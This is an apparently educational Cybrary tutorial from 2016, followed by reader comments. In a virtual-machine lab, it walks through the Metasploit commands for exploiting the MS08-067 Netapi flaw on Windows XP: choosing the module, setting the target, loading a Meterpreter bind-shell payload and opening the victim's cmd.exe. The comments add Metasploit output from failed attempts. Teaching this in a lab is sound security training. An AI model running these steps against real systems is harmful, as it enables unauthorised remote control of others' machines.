Windows XP Netapi Exploitation

March 7, 2016 | Views: 14656

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

In this article, I’ll show you how easily you can exploit a system running Windows XP using the Netapi exploit.

Before we start, you might be wondering why you’d exploit an old version of Windows. My answer is: you gotta take baby steps before you can run.


Lab Setup:

-> A Windows XP virtual machine with SP2/SP3 (I used SP2)

->A Kali Virtual machine / standalone system


I’ll leave finding the host on the network and identifying the services being run up to you.

Let’s assume you’ve found the IP address of your victim, which is say and your attacker machine’s is at


In your terminal on Kali, open up Metasploit:


In here, you’ll find: msfconsole, run it (it takes a moment to open)


Now we will search the Netapi exploit:

msf>search netapi

You’ll be shown a number of results, among which you’ll find:



Copy this and paste as follows:

msf>use exploit/windows/smb/ms08_067_netapi


Now, you’ll get:

msf exploit(ms08_067_netapi)>


The exploit is chosen and we need to set certain parameters for this exploit:

msf exploit(ms08_067_netapi)> show options

Set up rhost and rport (if not set by default) and set RHOST (the remote host or the victim) as follows:

msf exploit(ms08_067_netapi)> set rhost

port number for the remote host is set 445 by default


Our exploit is ready, but we need a payload for the exploitation. There are a number of payloads available, which can be searched as follows:

msf exploit(ms08_067_netapi)>search payload


I’ve tried bind shell and reverse shell. Here, we’ll go with bind shell:

msf exploit(ms08_067_netapi)> set payload windows/meterpreter/bind_tcp


Just like we set certain parameters for exploit before, we need to do the same here:

msf exploit(ms08_067_netapi)> show options


Set lport and lhost, which are the port number and IP address of the local machine/attacker machine:

msf exploit(ms08_067_netapi)>set lhost


We’re all set:

msf exploit(ms08_067_netapi)> exploit


If you’ve ollowed the steps correctly, you will be presented with a meterpreter prompt. To get the windows cmd, type in the following command:

meterpreter> execute -f cmd.exe -c -H


A channel will be created in the following output form:

‘ channel 1 created’

meterpreter> interact 1

You’ll ave the cmd of the victim!!


While choosing the exploit, you can use: >show target  to know which OS’s are vulnerable to this exploit.

The exploitation could have been done with:

windows/shell_bind_tcp but i went for the meterpreter command.


Read about meterpreter to know why. Here are a few links that you may find useful:


If you just started in exploitations, there may be a lot of doubts, so do connect with me.

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Thanks for this. Actually i started metasploit after some years and this time when i followed this tutorial i got this :->

    [*] Started bind handler
    [*] – Automatically detecting the target…
    [*] – Fingerprint: Windows XP – Service Pack 3 – lang:English
    [*] – Selected Target: Windows XP SP3 English (AlwaysOn NX)
    [*] – Attempting to trigger the vulnerability…
    [*] Exploit completed, but no session was created.

    Just want to confirm is that exploit still exist in windows ?

  2. The following exception is displayed after a few seconds when i run the IE 8 exploit in win also stopping the internet explorer working when link is clicked][1]

    **IE ERROR code**

    Problem Event Name: BEX

    Application Name: iexplore.exe

    Application Version: 8.0.7601.17514

    Application Timestamp: 4ce79912

    Fault Module Name: StackHash_0a9e

    Fault Module Version:

    Fault Module Timestamp: 00000000

    Exception Offset: 00000082

    Exception Code: c0000005

    Exception Data: 00000008

    OS Version: 6.1.7601.

    Locale ID: 1033

    Additional Information 1: 0a9e

    Additional Information 2: 0a9e372d3b4ad19135b953a78882e789

    Additional Information 3: 0a9e

    Additional Information 4: 0a9e372d3b4ad19135b953a78882e789

    **in metasploit it will show following**

    [*] Server started.

    [*] ms13_037_svg_dashstyle – Gathering target information.

    [*] ms13_037_svg_dashstyle – Sending HTML response.

    [*] ms13_037_svg_dashstyle – Sending HTML to info leak…

    [*] ms13_037_svg_dashstyle – Using ntdll ROP

    [*] ms13_037_svg_dashstyle – Sending HTML to trigger…

    i tried several exploits and got the same result which not getting the meterpreter stopped from here. why is it happen? please help

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?